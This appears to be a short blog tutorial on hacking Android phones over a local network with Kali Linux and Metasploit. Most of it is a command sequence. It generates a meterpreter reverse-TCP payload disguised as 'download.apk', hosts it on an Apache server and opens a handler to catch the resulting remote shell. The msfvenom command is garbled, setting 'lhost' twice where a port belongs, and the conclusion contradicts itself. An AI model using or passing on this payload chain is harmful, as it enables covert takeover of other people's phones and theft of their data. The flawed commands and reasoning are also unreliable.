Access an Android Device using Kali Linux

Blog post by ghost - published at 1/23/2023, 5:10:55 PM
This is an informative article for anyone who wants to learn more about how hackers hack android devices using Kali Linux in the LAN network.
Only use this for educational purposes neither try to violate any legal terms & conditions nor we are responsible for any data loss or misuse.
The goal of this section is to teach you how hackers hack Android devices. This will cover Kali Linux, what is Metasploit, and steps to gain access to an Android device.
Kali Linux is a Debian-based operating system designed for digital forensics and penetration testing. It can be used as a live CD or can be installed into the host computer’s hard drive. It includes more than 300 preinstalled tools that are aimed at penetration testing and digital forensics, including Nmap (a network scanner), w3af (web application security assessment framework), John the Ripper (password cracker), and Aircrack-ng (wireless LAN security tool).
Hacking is the process of breaking into a computer system to get access to data. It can also be used to change or delete data, or just gain control of the system.
The most popular hacking tool is Metasploit. It offers to exploit modules for vulnerabilities in various systems and relies on automated exploitation and payload delivery. It is used to find out the flaws in the system, perform penetration testing, exploit networks, and collect data. It is widely used because it leverages automation to provide fast results with minimal human input.
- Edit Virtual Machine Settings
- Network Adaptor
- Network Connection
- Bridged Connected directly to the physical network
- edit
- virtual network editor
- change settings
- bridged
- automatic
- apply
- ok
Update :-
- sudo apt update
If sudo apt update get error :-
- sudo nano /etc/apt/sources.list
Generate an android payload using msfvenom :-
- msfvenom -p android/meterpreter/reverse_tcp lhost=local_ip_address lhost=6969 -o download.apk
To find ip_address :-
- ifconfig
Exploiting the payload :-
- msfconsole
- use multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST (ip address)
- set LPORT 6969
To start the apache web server use the following command :-
- service apache2 start
To copy download.apk to apache server:-
- sudo cp download.apk /var/www/html
To view the status of apache web server use the following command :-
- service apache2 status
Exploit :-
- exploit
Conclusion : Hacking is easy With Kali Linux Tutorials & Tools!
Hacking is a process that most people believe they can do without any previous knowledge or experience, but this is a wrong notion. It is a misconception that hacking only takes skill and knowledge, it also requires patience and effort.
In this case, the person who has been hacking with Kali Linux Tutorials & Tools for years is not going to find it easy or simple to learn new things in a day or two.
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